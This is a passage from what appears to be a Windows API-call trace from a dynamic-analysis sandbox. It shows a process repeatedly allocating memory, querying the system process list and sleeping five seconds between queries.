RegionSize=0xdea68*=0x10000) returned 0x0 [0282.702] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.703] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.703] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.707] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.708] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.709] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.710] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.710] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.710] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.714] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.721] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.723] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.724] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.728] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.729] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.731] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.732] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.732] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.736] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.738] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.739] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.743] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.743] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.745] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.746] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.752] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.754] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.754] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.755] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.755] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.759] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.763] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.765] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.766] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.770] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.771] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.773] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.774] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.777] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.778] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.781] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.785] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.786] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.787] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.788] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.789] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.793] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.794] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.795] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.795] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.799] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.800] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.801] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.802] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.806] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.806] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.808] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.809] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.809] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.812] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.813] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.815] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.819] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.820] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.822] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.826] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.827] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.829] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0282.833] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0282.833] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0282.834] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0282.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0282.835] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0282.835] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0282.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.009] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.010] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.014] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.019] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0283.020] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0283.022] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0283.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0283.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0283.023] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0283.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0283.028] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 